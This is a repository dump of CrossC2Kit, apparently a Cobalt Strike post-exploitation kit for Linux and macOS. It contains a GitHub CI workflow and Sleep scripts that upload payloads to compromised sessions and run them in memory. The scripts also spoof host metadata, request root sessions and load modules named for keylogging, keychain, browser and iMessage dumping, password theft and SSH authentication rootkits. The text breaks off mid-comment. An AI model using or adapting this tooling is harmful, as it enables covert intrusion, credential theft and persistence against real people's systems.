├── .github └── workflows │ └── prcheck.yml ├── CrossC2Kit.cna ├── CrossC2Kit_Loader.cna ├── LICENSE ├── README.md ├── README_zh.md ├── compile.sh ├── gather ├── browser │ ├── cc2_chrome_dump.dylib │ ├── cc2_safari_dump.dylib │ └── safari_dump.cna ├── keychain │ ├── cc2_keychain_dump │ ├── cc2_keychain_list.dylib │ └── keychain_dump.cna ├── keylogger │ └── osx │ │ ├── cc2_keylogger.dylib │ │ └── keylogger_osx2.cna ├── message │ ├── cc2_iMessage_dump.dylib │ └── iMessage_dump.cna ├── password │ └── mimipenguin │ │ ├── cc2_mimipenguin.cna │ │ ├── mimipenguin.so │ │ └── mimipenguin32.so └── prompt │ └── osx │ ├── cc2_prompt_spoof.dylib │ └── cc2_prompt_spoof_dylib.cna ├── init └── setup.cna ├── jobs ├── cc2_jobs.cna ├── cc2_jobs.dylib ├── cc2_jobs.so └── cc2_jobs32.so ├── media ├── 15854585486601 │ └── 15854593957704.jpg └── 16295280892271 │ ├── 16295284817531.jpg │ ├── 16295285029337.jpg │ ├── 16547563992094.jpg │ └── 16547565084907.jpg ├── patch ├── install_name_tool ├── libpatchelf.so └── libpatchelf32.so ├── process ├── libinjector64.so └── processhelper.cna ├── proxy └── frp │ ├── cc2_frp.cna │ ├── crossc2_frp.dylib │ └── crossc2_frp.so ├── rootkit └── auth │ ├── auth_rootkit_mgr.so │ ├── auth_rootkit_mgr32.so │ ├── auth_rootkit_module.so │ ├── auth_rootkit_module32.so │ ├── auth_rootkit_remove.so │ ├── auth_rootkit_remove32.so │ ├── cc2_auth.cna │ ├── cc2_ssh.cna │ ├── ssh_rootkit.dylib │ ├── ssh_rootkit_mgr.dylib │ ├── ssh_rootkit_mgr.so │ ├── ssh_rootkit_mgr32.so │ ├── ssh_rootkit_module.so │ └── ssh_rootkit_module32.so ├── scanner └── ServerScan │ ├── linux │ ├── ELF │ │ ├── portscan │ │ ├── portscan386 │ │ ├── serverscan │ │ └── serverscan386 │ └── SO │ │ ├── crossc2_portscan.so │ │ └── crossc2_serverscan.so │ └── serverscan.cna ├── script ├── python-import.cna └── runScript.cna ├── spawn ├── runshellcode.cna ├── runshellcode.dylib ├── runshellcode.so └── runshellcode32.so ├── sshpass ├── sshpass.cna └── sshpass64 ├── third-party └── readme.md ├── 
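update_site
├── SSLUtils.jar
├── httprequest.cna
└── update_site.cna
└── utils
├── cc2FilesColor.cna
├── cc2ProcessColor.cna
├── logvis.cna
├── modifyMetaData.cna
├── portscan_result.cna
└── setEnv.cna
/.github/workflows/prcheck.yml:
--------------------------------------------------------------------------------
# PR build check: copies third-party/ and compile.sh out of the checkout,
# runs the build, and posts the log to the job summary on Linux and macOS.
# Note that compile.sh comes from the PR head, so this job executes
# contributor-supplied code; on pull_request events from forks the token is
# read-only, which is why the permissions below are kept at contents: read.
on:
  pull_request:
    branches: [main]

name: Pull Requests Check

# Least privilege for GITHUB_TOKEN: the job only reads the repository. Without
# this block the token gets the repository's default (possibly write) scope.
permissions:
  contents: read

jobs:
  job1:
    name: PR Check (linux)
    # ubuntu-18.04 has been retired from GitHub-hosted runners; use a supported
    # image so the check actually runs.
    runs-on: ubuntu-22.04
    steps:
      - name: Checkout code
        # Supply chain: actions/checkout@v2 runs on a deprecated Node runtime.
        # Prefer pinning to a full commit SHA over a mutable tag when possible.
        uses: actions/checkout@v4
      - name: Build project
        id: build
        run: |
          uname -a
          cp -r third-party /tmp/third-party
          cp compile.sh /tmp/
          cd /tmp
          chmod 755 compile.sh
          ./compile.sh > /tmp/elog
          find /tmp/third-party/ >> /tmp/elog
          # ::set-output is deprecated; step outputs are written to $GITHUB_OUTPUT.
          echo "res=$(uname -a)" >> "$GITHUB_OUTPUT"
      - name: Publish build summary
        # Run even when the build step failed so the log is still visible.
        if: always()
        # Hand the output to the script through an environment variable instead
        # of interpolating ${{ }} into the script body, so its content can never
        # be parsed as shell syntax.
        env:
          BUILD_RES: ${{ steps.build.outputs.res }}
        run: |
          echo "# Arch" >> $GITHUB_STEP_SUMMARY
          echo "\`${BUILD_RES}\`" >> $GITHUB_STEP_SUMMARY
          echo "# Build Result" >> $GITHUB_STEP_SUMMARY
          echo "" >> $GITHUB_STEP_SUMMARY
          echo "\`\`\`python" >> $GITHUB_STEP_SUMMARY
          cat /tmp/elog >> $GITHUB_STEP_SUMMARY
          echo "\`\`\`" >> $GITHUB_STEP_SUMMARY

  job2:
    name: PR Check (macOS)
    # macOS-10.15 has been retired from GitHub-hosted runners.
    runs-on: macos-13
    steps:
      - name: Checkout code
        uses: actions/checkout@v4
      - name: Build project
        id: build2
        run: |
          uname -a
          cp -r third-party /tmp/third-party
          cp compile.sh /tmp/
          cd /tmp
          chmod 755 compile.sh
          ./compile.sh > /tmp/elog
          find /tmp/third-party/ >> /tmp/elog
          echo "res=$(uname -a)" >> "$GITHUB_OUTPUT"
      - name: Publish build summary
        if: always()
        env:
          BUILD_RES: ${{ steps.build2.outputs.res }}
        run: |
          echo "# Arch" >> $GITHUB_STEP_SUMMARY
          echo "\`${BUILD_RES}\`" >> $GITHUB_STEP_SUMMARY
          echo "# Build Result" >> $GITHUB_STEP_SUMMARY
          echo "" >> $GITHUB_STEP_SUMMARY
          echo "\`\`\`python" >> $GITHUB_STEP_SUMMARY
          cat /tmp/elog >> $GITHUB_STEP_SUMMARY
          echo "\`\`\`" >>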
$GITHUB_STEP_SUMMARY
--------------------------------------------------------------------------------
/CrossC2Kit.cna:
--------------------------------------------------------------------------------
# Build a pseudo-random string of $1 ASCII letters.
# rand() is Sleep's general-purpose generator, not a CSPRNG: adequate for the
# task aliases and temp-file names this kit derives from it, but do not reuse
# it for anything that has to be unguessable.
# No local() here, so $limit/@random_str/$characters/$x/$n are script-globals
# that every call overwrites.
sub random_string {
    # <3 @offsec_ginger
    $limit = $1;
    @random_str = @();
    $characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
    for ($x = 0; $x < $limit; $x++) {
        $n = rand(strlen($characters));
        add(@random_str, charAt($characters, $n));
    }
    return join('', @random_str);
}

# Map a payload type name (case-insensitive) to the task-type code used in the
# task header: "0" for a standalone executable (elf / macho / elf/macho), "1"
# for a shared object (so / dylib / so/dylib). Anything else yields the
# integer -1, which callers test with == -1.
sub runType {
    $type = lc($1);
    if ($type eq "elf" || $type eq "macho" || $type eq "elf/macho") {
        return "0";
    } else if ($type eq "so" || $type eq "dylib" || $type eq "so/dylib") {
        return "1";
    }
    return -1;
}



# Build the "CrossC2@^..." task header that bcrossc2_load_dyn* upload as the
# remote file name.
#   $1 type code from runType()       $2 alias the payload is stored under
#   $3 result type ("no-info" -> 98765) $4 run-after-load flag (y/yes -> "Y")
#   $5 persistence flag (y/yes appends "$$" to the alias)
#   $6 xor key                        $7 payload size   $8 transport argument
# An 8-letter random task name is generated per call, so the header differs
# on every call even for the same payload.
sub genTaskinfo_dyn {
    $taskType = $1;
    $taskAliasName = $2;
    $taskResType = $3;
    $taskNeedRun = lc($4);
    if ($taskNeedRun eq "y" || $taskNeedRun eq "yes") {
        $taskNeedRun = "Y";
    } else {
        $taskNeedRun = "N";
    }
    $taskNeedPersistence = lc($5);
    if ($taskNeedPersistence eq "y" || $taskNeedPersistence eq "yes") {
        $taskAliasName = $taskAliasName . "\$\$";
    }
    # NOTE(review): $taskXorKey is stored but never placed in the header
    # below, so within this function the key has no effect.
    $taskXorKey = $6;
    $juicySize = $7;
    $transportArg = $8;

    $taskName = random_string(8);

    # "no-info" is encoded as the literal sentinel 98765.
    if ($taskResType eq "no-info") {
        $taskResType = "98765";
    }


    $taskinfo = "CrossC2@^" . $taskType . "^" . $taskNeedRun . "^". $taskName . "^". $taskAliasName . "^" . $taskResType . "^" . $juicySize . "^" . $transportArg;
    return $taskinfo;
}


# Build the "CC2-PyScript^..." header for in-memory script execution.
#   $1 script type   $2 interpreter path (or 'null')   $3 result type
#   $4 script size   $5 transport argument
# (the definition continues on the next page line)
sub genMemScriptInfo {
    $scriptType = $1;
    $scriptEngPath = $2;
    $taskResType = $3;
    $juicySize = $4;
    $transportArg = $5;

    $taskinfo = "CC2-PyScript^" . $scriptType . "^". $scriptEngPath . "^" . $taskResType . "^" . $juicySize . "^" .
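$transportArg;
    return $taskinfo;
}

# Escape a value for use inside a POSIX-shell double-quoted string. Only
# backslash, double quote, dollar and backtick stay special there; backslash
# is handled first so the other escapes are not doubled.
sub cc2_dquote_escape {
    local('$v');
    $v = strrep($1, "\\", "\\\\");
    $v = strrep($v, "\"", "\\\"");
    $v = strrep($v, "\$", "\\\$");
    $v = strrep($v, "`", "\\`");
    return $v;
}

# Produce a header that is prepended to an in-memory script so the script sees
# its arguments the way it would from a command line.
#   $1 script type: "python", "zsh" or "bash" (perl/ruby/php are accepted but
#      yield an empty header)
#   $2 array of argument values
# Returns the header text, always terminated by "\n".
#
# Fix: values are embedded inside quoted literals of the target language, so
# the quote/escape characters of that language are now escaped. Previously an
# argument containing ' (python) or " $ ` (bash/zsh) ended the literal early and
# the remainder of the argument was evaluated as code. Raw newlines inside a
# value are still not handled.
sub scriptArgsHook {
    local('$scriptType @args $hook_header $index $value $escaped');
    $scriptType = $1;
    @args = $2;
    $hook_header = "";

    if ($scriptType eq "python") {
        # sys.argv=['a','b',] using single-quoted Python literals.
        $hook_header = "import sys\nsys.argv=[";
        foreach $index => $value (@args) {
            $escaped = strrep(strrep($value, "\\", "\\\\"), "'", "\\'");
            $hook_header = $hook_header."'".$escaped."',";
        }
        $hook_header = $hook_header.']';
    } else if ($scriptType eq "zsh") {
        # One assignment per argument: <index>="<value>".
        $hook_header = "";
        foreach $index => $value (@args) {
            $hook_header = $hook_header.$index."=\"".cc2_dquote_escape($value)."\"\n";
        }
    } else if ($scriptType eq "bash") {
        # set -- "a" "b"; index 0 is skipped so it takes the place of $0.
        $hook_header = "set -- ";
        foreach $index => $value (@args) {
            if ($index == 0) {
                continue;
            }
            # $hook_header = $hook_header."BASH_ARGV".$index."=\"".$value."\"\n";
            $hook_header = $hook_header."\"".cc2_dquote_escape($value)."\" ";
        }
    } else if ($scriptType eq "perl") {

    } else if ($scriptType eq "ruby") {

    } else if ($scriptType eq "php") {

    }
    $hook_header = $hook_header."\n";
    # println($hook_header);

    return $hook_header;
}

# Join the arguments after the first one with "^" (note the leading "^",
# since index 0 is skipped but the separator is not) and base64-encode.
sub transportArg {
    $arg = "";
    foreach $index => $value (@_) {
        if ($index != 0) {
            $arg = $arg . "^" .$value;
        }
    }
    return base64_encode($arg);
}

# Join the elements of array $2 whose index is >= $1 with "^" (no leading
# separator) and base64-encode. (continues on the next page line)
sub transportArgs {
    $afterIndex = int($1) - 1;
    $arg = "";
    foreach $index => $value ($2) {
        if ($index > $afterIndex) {
            if ($arg eq "") {
                $arg = $value;
            } else {
                $arg = $arg .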
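"^" .$value;
            }
        }
    }
    return base64_encode($arg);
}

# Return the elements of array $2 whose index is >= $1, as a new array.
sub transportArgsArray {
    $afterIndex = int($1) - 1;
    @arg = @();
    foreach $index => $value ($2) {
        if ($index > $afterIndex) {
            push(@arg,$value);
        }
    }
    return @arg;
}


# Join the elements of $2 whose index is > $1 with single spaces. Unlike
# transportArgsArray this skips one more leading element.
sub transportStrings {
    $afterIndex = int($1) - 1;
    $arg = "";
    $flag = 1;
    foreach $index => $value ($2) {
        if ($index > $afterIndex+1) {
            if ($flag == 1) {
                $arg = $arg.$value;
                $flag = 0;
            } else {
                $arg = $arg." ".$value;
            }
        }
    }
    return $arg;
}

# Upload a payload (executable or shared library) to the session for
# in-memory loading.
#   $1 beacon id            $2 type name for runType()   $3 alias on the target
#   $4 result type          $5 run-after-load flag       $6 persistence flag
#   $7 xor key              $8 file name, resolved next to this script first
#   $9 transport argument
# The bytes are pushed with bupload_raw! under the header from
# genTaskinfo_dyn(); the "!" form does not echo the task to the console.
# Fix: a bad type or a missing payload now returns after berror() instead of
# falling through and uploading anyway (the original would have passed the
# result of reading a non-existent file to bupload_raw!).
sub bcrossc2_load_dyn_pro {
    local('$beaconid $taskType $taskName $taskResType $taskNeedRun $taskNeedPersistence $taskXorKey $loadFileName $taskArgs');
    local('$loadFilePath $juicySize $handle $juicyData $ELFName');
    $beaconid = $1;
    $taskType = $2;
    $taskName = $3;
    $taskResType = $4;
    $taskNeedRun = $5;
    $taskNeedPersistence = $6;
    $taskXorKey = $7;
    $loadFileName = $8;
    $taskArgs = $9;

    # Resolve relative to the script directory first, then as given.
    $loadFilePath = script_resource($loadFileName);
    $juicySize = lof($loadFilePath);
    if ($juicySize <= 0) {
        $loadFilePath = $loadFileName;
        $juicySize = lof($loadFilePath);
    }
    if ($juicySize <= 0) {
        berror($beaconid, "[ CrossC2 ]: payload not found or empty: " . $loadFileName);
        return;
    }

    $taskType = runType($taskType);
    if ($taskType == -1) {
        berror($beaconid, "[ CrossC2 ]: dynamic lib or executable filetype not found");
        return;
    }

    $handle = openf($loadFilePath);
    $juicyData = readb($handle, -1);
    closef($handle);

    $ELFName = genTaskinfo_dyn($taskType, $taskName, $taskResType, $taskNeedRun, $taskNeedPersistence, $taskXorKey, $juicySize, $taskArgs);
    bupload_raw!($beaconid,$ELFName,$juicyData);
}

# Shorthand loader with fixed flags (run = Y, persistence = N, xor key = 2);
# $6 is base64-encoded as the transport argument. (continues on the next line)
sub bcrossc2_load_dyn {
    $beaconid = $1;
    $taskType = $2;
    $taskName = $3;
    $taskResType = $4;
    $taskNeedRun = "Y";
    $taskNeedPersistence =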
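"N";
    $taskXorKey = "2";
    $loadFileName = $5;
    $taskArgs = base64_encode($6);

    # Resolve relative to the script directory first, then as given.
    $loadFilePath = script_resource($loadFileName);
    $juicySize = lof($loadFilePath);
    if ($juicySize <= 0) {
        $loadFilePath = $loadFileName;
        $juicySize = lof($loadFilePath);
    }
    if ($juicySize <= 0) {
        berror($beaconid, "[ CrossC2 ]: payload not found or empty: " . $loadFileName);
        return;
    }

    # Fix: validation failure returns instead of uploading anyway.
    $taskType = runType($taskType);
    if ($taskType == -1) {
        berror($beaconid, "[ CrossC2 ]: dynamic lib or executable filetype not found");
        return;
    }

    $handle = openf($loadFilePath);
    $juicyData = readb($handle, -1);
    closef($handle);

    $ELFName = genTaskinfo_dyn($taskType, $taskName, $taskResType, $taskNeedRun, $taskNeedPersistence, $taskXorKey, $juicySize, $taskArgs);
    bupload_raw!($beaconid,$ELFName,$juicyData);
}

# Upload a script for in-memory execution by the given interpreter.
#   $1 beacon id      $2 script type       $3 interpreter path (or 'null')
#   $4 result type    $5 script file name  $6 array of script arguments
# The argument header from scriptArgsHook() is prepended to the script body;
# the size in the header is that of the file alone, as in the original.
# Fix: the original resolved $loadFilePath (script_resource() first, then the
# literal path) but then opened and measured $loadFileName, so a script shipped
# next to the .cna could not be read; the resolved path is used throughout,
# and a missing script is reported instead of read as $null.
sub brun_script_in_mem {
    $beaconid = $1;
    $scriptType = $2;
    $scriptEngPath = $3;
    $taskResType = $4;
    $loadFileName = $5;
    @taskArgs = $6;

    $loadFilePath = script_resource($loadFileName);
    $juicySize = lof($loadFilePath);
    if ($juicySize <= 0) {
        $loadFilePath = $loadFileName;
        $juicySize = lof($loadFilePath);
    }
    if ($juicySize <= 0) {
        berror($beaconid, "[ CrossC2 ]: script not found or empty: " . $loadFileName);
        return;
    }

    $handle = openf($loadFilePath);
    $juicyData = readb($handle, -1);
    closef($handle);

    $scriptName = genMemScriptInfo($scriptType, $scriptEngPath, $taskResType, $juicySize, "");
    # blog($beaconid, "[brun_script_in_mem]: args = ".@taskArgs);

    $header = scriptArgsHook($scriptType, @taskArgs);

    bupload_raw!($beaconid,$scriptName,$header.$juicyData);
}


# Entry point for the run-script aliases.
#   $1 script type   $2 result type   $3 command tokens, $3[0] being the beacon id
# If $3[1] names an existing local file it is uploaded with the remaining
# tokens as arguments; otherwise the remaining tokens are treated as inline
# script text. (continues on the next page line)
sub CrossC2MemScriptEng {
    $taskResType = $2; # info -> normal message

    $beaconid = $3[0];
    $scriptType = $1;
    $scriptEnginePath = 'null';

    $contentType = $3[1];
    $scriptLocalPath = $3[1];
    $transportArg = $3[1];

    $juicySize = lof($scriptLocalPath);
    if ($juicySize == 0) {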
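$scriptLocalPath = "cc2_".$scriptType."_".random_string(6);
        $transportArg = 'null';
        # Inline script: tokens from index 2 on become the script body (token 1
        # is consumed above). The text is written to a temp file in the
        # client's current directory, uploaded, then deleted.
        $data = transportStrings(1, $3);
        $out = openf(">" . $scriptLocalPath);
        writeb($out, $data);
        closef($out);
        brun_script_in_mem($beaconid, $scriptType, $scriptEnginePath, $taskResType, $scriptLocalPath, @());
        deleteFile($scriptLocalPath);
    } else {
        # File script: tokens after the path are forwarded as arguments, with
        # the script's base name appended last.
        @args = transportArgsArray(2, $3);
        # Fix: lindexOf() returns $null when there is no '/', and $null + 1 is
        # 1, which dropped the first character of a bare file name.
        $pathIndex = lindexOf($scriptLocalPath, '/');
        if ($pathIndex is $null) {
            $pathIndex = -1;
        }
        $pathIndex += 1;
        $filename = substr($scriptLocalPath, $pathIndex);
        add(@args, $filename);
        blog($beaconid, "[cc2_memScript]: ".@args);
        brun_script_in_mem($beaconid, $scriptType, $scriptEnginePath, $taskResType, $scriptLocalPath, @args);
    }

}

# Send a metadata-override command ("<key> <value>") to the session's shell
# and echo it to the console.
# Fix: local() declared $beaconid while the body assigns $bid, so $bid leaked
# into script scope; the declaration now matches the variable used.
sub bset_metadata {
    local('$bid $metadata_key $metadata_value');
    $bid = $1;
    $metadata_key = $2;
    $metadata_value = $3;

    binput($bid, "$metadata_key $metadata_value");
    bshell($bid, "$metadata_key $metadata_value");
}

# Override the OS type shown for session $1.
sub bsetostype {
    local('$bid $ostype');
    $bid = $1;
    $ostype = $2;

    bset_metadata($bid, "setostype", $ostype);
}

# Override the internal IP shown for session $1.
sub bsetlocalip {
    local('$bid $localip');
    $bid = $1;
    $localip = $2;

    bset_metadata($bid, "setlocalip", $localip);
}

# Override the host name shown for session $1.
sub bsethostname {
    local('$bid $hostname');
    $bid = $1;
    $hostname = $2;

    bset_metadata($bid, "sethostname", $hostname);
}

# setenv NAME VALUE for session $1; name and value are passed unquoted.
sub bcc2_setenv {
    if($1 && $2 && $3){
        binput($1, "shell setenv $2 $3");
        bshell($1, "setenv $2 $3");
    } else {
        berror($1, "*[error]: setenv env_name env_value");
    }
}

# unsetenv NAME for session $1.
sub bcc2_unsetenv {
    if($1 && $2) {
        binput($1, "shell unsetenv $2");
        bshell($1, "unsetenv $2");
    } else {
        berror($1, "*[error]: unsetenv env_name");
    }
}

# Ask the session to spawn a new session. (continues on the next page line)
sub bcc2_spawn {
    binput($1,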
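"shell spawn");
    bshell($1, "spawn");
}

# Ask the session to elevate to a root session (see the help text registered
# for getsystem).
sub bcc2_getsystem {
    binput($1, "shell getsystem");
    bshell($1, "getsystem");
}

# Pending uploads polled by the heartbeat_1s handler. Each entry is
# @(bid, local_path, remote_dir, remote_name, size, callback, callback_args,
#   size_matched, callback_ran), the last two being the strings 'true'/'false'.
@fileupload_list = @();
global(@fileupload_list);

# Upload local file $2 to $3/$4 on the target and register callback $5 (called
# with the beacon id and $6) to run once the remote file reaches the local size.
# Fix: the list entry ended in 'false' 'false' with no comma, which cannot
# yield the nine elements the heartbeat reads ($f_value[8]); $cb_args is now
# declared local; and the task message shows the same path that is uploaded.
sub bawait_upload {
    local('$bid $file_lpath $file_rpath $file_rname $file_data $file_size $cb $cb_args $handle $file_list_count');
    $bid = $1;
    $file_lpath = $2;
    $file_rpath = $3;
    $file_rname = $4;
    $cb = $5;
    $cb_args = $6;
    $handle = openf($file_lpath);
    $file_data = readb($handle, -1);
    closef($handle);
    $file_size = lof($file_lpath);

    btask($bid, 'upload file '.$file_lpath.' to '.$file_rpath.'/'.$file_rname);

    $file_list_count = size(@fileupload_list);
    add(@fileupload_list, @($bid, $file_lpath, $file_rpath, $file_rname, $file_size, $cb, $cb_args, 'false', 'false'));
    bupload_raw!($bid, $file_rpath.'/'.$file_rname, $file_data);
}

# Same as bawait_upload but $2 is the data itself; a random 10-letter label
# stands in for the local path in the list entry and the task message.
sub bawait_upload_raw {
    local('$bid $file_lpath $file_rpath $file_rname $file_data $file_size $cb $cb_args $handle $file_list_count');
    $bid = $1;
    $file_data = $2;
    $file_rpath = $3;
    $file_rname = $4;
    $cb = $5;
    $cb_args = $6;
    $file_size = strlen($file_data);
    $file_lpath = random_string(10);

    btask($bid, 'upload rawData file-['.$file_lpath.'] to '.$file_rpath.'/'.$file_rname);

    $file_list_count = size(@fileupload_list);
    add(@fileupload_list, @($bid, $file_lpath, $file_rpath, $file_rname, $file_size, $cb, $cb_args, 'false', 'false'));
    bupload_raw!($bid, $file_rpath.'/'.$file_rname, $file_data);
}

# Task an `ls` of remote directory $2 on beacon $1 and, in the callback, mark
# the pending entry for $3 as size-matched once the listed size is >= $4.
# Matching is by remote file name only, not by beacon or directory.
# (continues on the next page line)
sub bcheck_file_size {
    this('$bid $file_path $file_name $file_size $realsize $name $temp $f_rname $f_match_size ');
    $bid = $1;
    $file_path = $2;
    $file_name = $3;
    $file_size = $4;

    bls($bid, $file_path, lambda({
        this('@lines @subl $type $s $lastmod $name');
        this('$file_name $file_size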
$realsize $f_key $f_value $f_rname')
        # NOTE(review): no ';' terminates the this() call above in the original.
        # Parse the bls output: first line is a header, then one
        # "type\tsize\tlastmod\tname" row per entry.
        @lines = split("\n", ["$3" trim]);
        @subl = sublist(@lines, 1);
        foreach $temp (@subl) {
            ($type, $s, $lastmod, $name) = split("\t", $temp);
            if ($name eq $file_name) {
                $realsize = long($s);
                if ($realsize >= $file_size) {
                    # Flag the first pending entry with this remote name; two
                    # pending uploads sharing a name are not told apart.
                    foreach $f_key => $f_value (@fileupload_list) {
                        $f_rname = $f_value[3];
                        if ($name eq $f_rname) {
                            @fileupload_list[$f_key][7] = 'true';
                            break;
                        }
                    }
                }
                break;
            }
        }
    }, $file_name => $file_name, $file_size => $file_size)
    );
}
# Every second: re-check every pending upload whose size is not yet confirmed
# (each check is a new `ls` task on the target, so N pending uploads mean N
# directory listings per second - noisy in the beacon log and for host
# monitoring), run at most one matured callback, then retire at most one
# size-matched entry.
on heartbeat_1s {
    local('$f_key $f_value $f_bid $f_lpath $f_rpath $f_rname $f_size $f_func $f_match_size');
    if (size(@fileupload_list) > 0) {
        foreach $f_key => $f_value (@fileupload_list) {
            $f_bid = $f_value[0];
            $f_lpath = $f_value[1];
            $f_rpath = $f_value[2];
            $f_rname = $f_value[3];
            $f_size = $f_value[4];
            $f_cb = $f_value[5];
            $f_cb_args = $f_value[6];
            $f_match_size = $f_value[7];
            $f_cb_runed = $f_value[8];

            if ($f_match_size eq 'false') {
                bcheck_file_size($f_bid, $f_rpath, $f_rname, $f_size);
            }
            if ($f_match_size eq 'true') {
                if ($f_cb_runed eq 'false') {
                    @fileupload_list[$f_key][8] = 'true';
                    # Invoke the stored closure with (beacon id, callback args).
                    [$f_cb: $f_bid, $f_cb_args];
                    break;
                }
            }
        }
        foreach $f_key => $f_value (@fileupload_list) {
            $f_match_size = $f_value[7];
            if ($f_match_size eq 'true') {
                removeAt(@fileupload_list, int($f_key));
                break;
            }
        }
    }
}

# Print the pending-upload list to the client console and log each entry's
# local path to the session. (continues on the next page line)
ssh_alias list_uploadingFile {
    println(@fileupload_list);
    $bid = $1;
    local('$f_key $f_value $f_bid $f_lpath $f_rpath $f_rname $f_size $f_func $f_match_size');
    if (size(@fileupload_list) > 0) {
        foreach $f_key => $f_value (@fileupload_list) {
            $f_bid = $f_value[0];
            $f_lpath = $f_value[1];
            $f_rpath = $f_value[2];
            $f_rname =
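$f_value[3];
            $f_size = $f_value[4];
            $f_cb = $f_value[5];
            $f_cb_args = $f_value[6];
            $f_match_size = $f_value[7];
            $f_cb_runed = $f_value[8];
            blog($bid, $f_lpath);
        }
    }
}

# Collect the Sites whose Description contains "CrossC2".
# Returns a hash of running index => @(Description, "<Proto><Host>:<Port><URI>").
# Fix: local() takes a space-separated name list; the commas in the original
# list were part of the names, so those variables were not actually local.
# $site_list and $beaconURL are declared as well.
sub getCrossC2Site {
    local('%beacon_site $beacon_count $site_list $beaconURL $Description $Proto $Host $Port $URI');
    %beacon_site = %();
    $beacon_count = 0;
    foreach $site_list(sites()) {
        ($Description, $Proto, $Host, $Port, $URI) = values($site_list, @('Description', 'Proto', 'Host', 'Port', 'URI'));
        if ("CrossC2" isin $Description) {
            $beaconURL = $Proto.$Host.':'.$Port.$URI;
            # return beacon_uri & beacon_description
            %beacon_site[$beacon_count] = @($Description, $beaconURL);
            $beacon_count += 1;
        }
    }
    return %beacon_site;
}

# Collect the local listeners whose name contains "CrossC2".
# Returns a hash of running index => @(listener name).
sub getCrossC2Listener {
    local('%beacon_listener $beacon_count $listener');
    %beacon_listener = %();
    $beacon_count = 0;
    foreach $listener(listeners_local()) {
        if ("CrossC2" isin $listener) {
            %beacon_listener[$beacon_count] = @($listener);
            $beacon_count += 1;
        }
    }
    return %beacon_listener;
}

# Collect the active SSH sessions as "internal@computer" labels.
# Returns a hash of running index => @(label).
sub getSSHSession {
    local('%sessionMap $sessionCount $beacon $internal $computer $tempMenuBar');
    %sessionMap = %();
    $sessionCount = 0;
    foreach $beacon (beacons()) {
        ($internal, $computer) = values($beacon, @('internal', 'computer'));
        $tempMenuBar = $internal."@".$computer;
        if (!-isactive $beacon['id']) {
        } else if (-isssh $beacon['id']) {
            %sessionMap[$sessionCount] = @($tempMenuBar);
            $sessionCount += 1;
        }
    }
    return %sessionMap;
}

# Return the CrossC2 beacon payload stored in listener $1's info: the 'lib'
# variant or the 'main' variant, else $null. (continues on the next page line)
sub getCrossC2Beacon {
    local('$listener $type $beaconData');
    $listener = $1;
    $type = $2;

    $beaconData = $null;
    if ($listener && $type) {
        if ($type eq 'lib') {
            $beaconData = listener_info($listener)['CrossC2libBeacon'];
        } else if ($type eq 'main') {
            $beaconData =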
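listener_info($listener)['CrossC2Beacon'];
        }
    }
    return $beaconData;
}
--------------------------------------------------------------------------------
/CrossC2Kit_Loader.cna:
--------------------------------------------------------------------------------
# Loader: pulls in every module of the kit, then the dialogs and the
# right-click menu for SSH sessions. Each include is evaluated in the Cobalt
# Strike client with the operator's privileges.
include(script_resource("init/setup.cna"));
include(script_resource("jobs/cc2_jobs.cna"));
include(script_resource("script/runScript.cna"));
include(script_resource("script/python-import.cna"));
include(script_resource("proxy/frp/cc2_frp.cna"));
include(script_resource("rootkit/auth/cc2_ssh.cna"));
include(script_resource("rootkit/auth/cc2_auth.cna"));
#include(script_resource("scanner/ServerScan/serverscan.cna"));
include(script_resource("gather/password/mimipenguin/cc2_mimipenguin.cna"));
include(script_resource("gather/prompt/osx/cc2_prompt_spoof_dylib.cna"));
include(script_resource("gather/keylogger/osx/keylogger_osx2.cna"));
include(script_resource("gather/browser/safari_dump.cna"));
# NOTE(review): the file tree at the top of this page lists no
# gather/browser/chrome_dump.cna (only cc2_chrome_dump.dylib); if the file is
# absent this include fails when the kit loads.
include(script_resource("gather/browser/chrome_dump.cna"));
include(script_resource("gather/keychain/keychain_dump.cna"));
include(script_resource("gather/message/iMessage_dump.cna"));
include(script_resource("process/processhelper.cna"));
include(script_resource("sshpass/sshpass.cna"));
include(script_resource("update_site/update_site.cna"));
include(script_resource("utils/cc2FilesColor.cna"));
include(script_resource("utils/cc2ProcessColor.cna"));
include(script_resource("utils/portscan_result.cna"));
include(script_resource("utils/setEnv.cna"));
include(script_resource("utils/modifyMetaData.cna"));
include(script_resource("utils/logvis.cna"));
include(script_resource("spawn/runshellcode.cna"));

# Placeholder: the item has no body, so "Run Inveigh" does nothing.
popup ssh_bottom {
    menu "Inveigh"{
        item "Run Inveigh"{
        }
    }
}

# Dialog callback for "MemoryFile Loader"; $3 is the dialog's value map.
# Fix: the beacon id is taken from the dialog values instead of the
# script-global $beaconid left behind by openMemoryFileLoadDialog(), which is
# overwritten whenever another loader dialog is opened for a different session.
# (continues on the next page line)
sub openMemoryFileLoadDialogCallBack {
    $beaconid = $3['beaconid'];
    $taskFile = $3['taskFile'];
    $fileAliasName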
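= $3['fileAliasName'];
    $taskType = $3['taskType'];
    $taskResType = $3['taskResType'];
    $taskNeedRun = $3['taskNeedRun'];
    $taskNeedPersistence = $3['taskNeedPersistence'];
    $taskXorKey = $3['taskXorKey'];

    $transportArg = "";
    bcrossc2_load_dyn_pro($beaconid, $taskType, $fileAliasName, $taskResType, $taskNeedRun, $taskNeedPersistence, $taskXorKey, $taskFile, $transportArg);
}

# Open the "MemoryFile Loader" dialog for session $1.
sub openMemoryFileLoadDialog {
    $beaconid = $1;
    $dialog = dialog("MemoryFile Loader", %(beaconid => $beaconid, taskFile => "", fileAliasName => "", taskType => "", taskResType => "", taskNeedRun => "", taskNeedPersistence => "yes", taskXorKey => "13"), &openMemoryFileLoadDialogCallBack);
    dialog_description($dialog, "load file to memory");

    # fileAliasName   // alias
    # fileName        // real file name -> taken from the file browser
    # taskType = "so";       file type / selector
    # taskResType = "info";  # result type of the execution / selector
    # taskNeedRun = "Y";     # taskNeedRun -> Y / N
    # taskNeedPersistence = "N"; # taskNeedPersistence -> Y / N
    # taskXorKey = 13;       # taskXorKey: XOR key for the file content

    drow_file($dialog, "taskFile", "Choose: ");
    drow_text($dialog, "fileAliasName", "fileAliasName: ", "fileAliasName"); # alias under which the implant stores the payload
    drow_combobox($dialog, "taskType", "taskType: ", @("so/dylib", "ELF/MachO"));
    drow_combobox($dialog, "taskResType", "taskResType: ", @("info", "portscan", "credentials", "keystrokes", "screenshot", "no-info"));
    drow_combobox($dialog, "taskNeedRun", "taskNeedRun: ", @("no", "yes"));
    # No control is drawn for taskNeedPersistence, so the callback always gets
    # the dialog default ("yes"). This assignment only sets a script-global
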